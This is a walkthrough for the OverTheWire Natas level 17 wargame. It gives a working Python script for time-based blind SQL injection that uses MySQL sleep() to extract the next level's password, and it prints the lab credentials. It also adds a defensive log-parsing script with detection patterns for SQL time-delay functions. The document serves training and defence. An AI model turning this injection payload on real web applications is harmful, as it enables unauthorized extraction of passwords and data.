OverTheWire Natas Level 16 -> Level 17 - Walkthrough



Introduction

In this level, I'll give you a walkthrough of the natas wargame Level 16 -> Level 17. The PHP code in this level is similar to that of a previous level (natas15), so we will write a Python script to extract the password.

Goal

Login to natas17 and get the password for the next level.

Login details

URL - http://natas17.natas.labs.overthewire.org
Username - natas17
Password - XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd

Theory

The PHP code is similar to what we saw in natas15, apart from the comments: the echo statement that reported whether the entered user exists has been commented out this time.

The sleep() function in MySQL delays execution by the specified number of seconds. It returns 0 on success, and a warning or an error if a NULL or negative value is given. Syntax - sleep(seconds)

We will use it in the script to delay the response, and treat that delay as the indication that the character we are testing is present in the password.

Solution

Open the URL in a browser. Enter the username and password mentioned above.


After logging in successfully, the page below appears. It has a form to enter a username and check whether that user exists.


Click on "View sourcecode" to see the code.


The code is similar to what we saw in natas15, except that the echo statement has been commented out, so the response no longer tells us whether the user exists.

Since the response content gives us no indication, we will use response time instead. We include MySQL's sleep function in the injected query so that, if the character we supply is present in the password, the database sleeps for 2 seconds, and if it is not present, nothing happens. If the response takes at least 2 seconds, we know the character exists in the password.

Write the code below and save it on your system:

import requests

target = 'http://natas17.natas.labs.overthewire.org'
# Every character a natas password can contain (they are alphanumeric).
charset_0 = (
    '0123456789' +
    'abcdefghijklmnopqrstuvwxyz' +
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
)
webauth = ('natas17', 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd')

# Step 1: find which characters occur anywhere in the password. sleep(2) is
# only reached when the LIKE test is true, so a response that takes at least
# 2 seconds means the character is present.
charset_1 = ''
for c in charset_0:
    username = ('natas18" AND password LIKE BINARY "%' + c + '%" AND sleep(2) #')
    r = requests.get(target,
        auth=webauth,
        params={"username": username}
    )
    if r.elapsed.total_seconds() >= 2:
        charset_1 += c
        print('CSET: ' + charset_1.ljust(len(charset_0), '*'))

# Step 2: build the password one character at a time, trying only the
# characters collected in step 1 as the next character of the prefix.
password = ""
while len(password) != 32:
    for c in charset_1:
        t = password + c
        username = ('natas18" AND password LIKE BINARY "' + t + '%" AND sleep(2) #')
        r = requests.get(target,
            auth=webauth,
            params={"username": username}
        )
        if r.elapsed.total_seconds() >= 2:
            print('PASS: ' + t.ljust(32, '*'))
            password = t
            break
    else:
        # No character extended the prefix (for example because a slow
        # response was missed in step 1); stop instead of looping forever.
        print('No match for prefix ' + password + '; rerun step 1.')
        break

In the above script, the first for loop tests, for every character, whether it is present in the password. Once that loop ends, we have the set of all characters that occur in the password. The second loop tests only the characters gathered by the first loop, one position at a time, and recovers the password.
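From the defender's side, this kind of probing leaves two traces in the web server log: the delay function in the query string and the abnormal response time. The script below is an added example, not part of the original walkthrough; it parses constructed nginx-style "combined" log lines with $request_time appended as the last field (an assumed log format) and flags both indicators, including the case where a wrong guess returns quickly but the payload still carries the delay function.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (not real traffic). Format: nginx "combined"
# with $request_time appended as the final field. Line 2 is a correct guess
# (slow), line 3 a wrong guess (fast) of the same kind of probe.
SAMPLE_LOG = """\
10.0.0.5 - natas17 [01/Jan/2024:10:00:01 +0000] "GET /?username=alice HTTP/1.1" 200 512 "-" "python-requests/2.31" 0.012
10.0.0.5 - natas17 [01/Jan/2024:10:00:02 +0000] "GET /?username=natas18%22+AND+password+LIKE+BINARY+%22%25a%25%22+AND+sleep%282%29+%23 HTTP/1.1" 200 512 "-" "python-requests/2.31" 2.031
10.0.0.5 - natas17 [01/Jan/2024:10:00:05 +0000] "GET /?username=natas18%22+AND+password+LIKE+BINARY+%22%25z%25%22+AND+sleep%282%29+%23 HTTP/1.1" 200 512 "-" "python-requests/2.31" 0.011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rtime>[\d.]+)$'
)

# Database functions used to stall a query on purpose (MySQL, PostgreSQL, MSSQL).
TIME_FUNCS = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor)\s*\(', re.IGNORECASE)
SLOW_SECONDS = 1.5  # a trivial user lookup should never take this long


def analyse(log_text, slow_seconds=SLOW_SECONDS):
    """Return one finding dict per suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        # parse_qsl undoes the URL encoding, so sleep%282%29 becomes sleep(2)
        params = parse_qsl(urlsplit(m['url']).query, keep_blank_values=True)
        rtime = float(m['rtime'])
        reasons = []
        for name, value in params:
            if TIME_FUNCS.search(value):
                reasons.append(f'time-delay function in parameter {name!r}')
        if rtime >= slow_seconds:
            reasons.append(f'slow response ({rtime:.3f}s)')
        if reasons:
            findings.append({'ip': m['ip'], 'ts': m['ts'], 'rtime': rtime, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyse(SAMPLE_LOG):
        print(f['ts'], f['ip'], '; '.join(f['reasons']))
```

Matching on the decoded payload is what catches the wrong guesses; a timing threshold alone only sees the requests where the guess happened to be right.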

Run the script and, after a few minutes, the password will be printed on the screen.

This completes the walkthrough for Level 17, as we have obtained the password for natas18. Please post your questions and suggestions in the comment section.
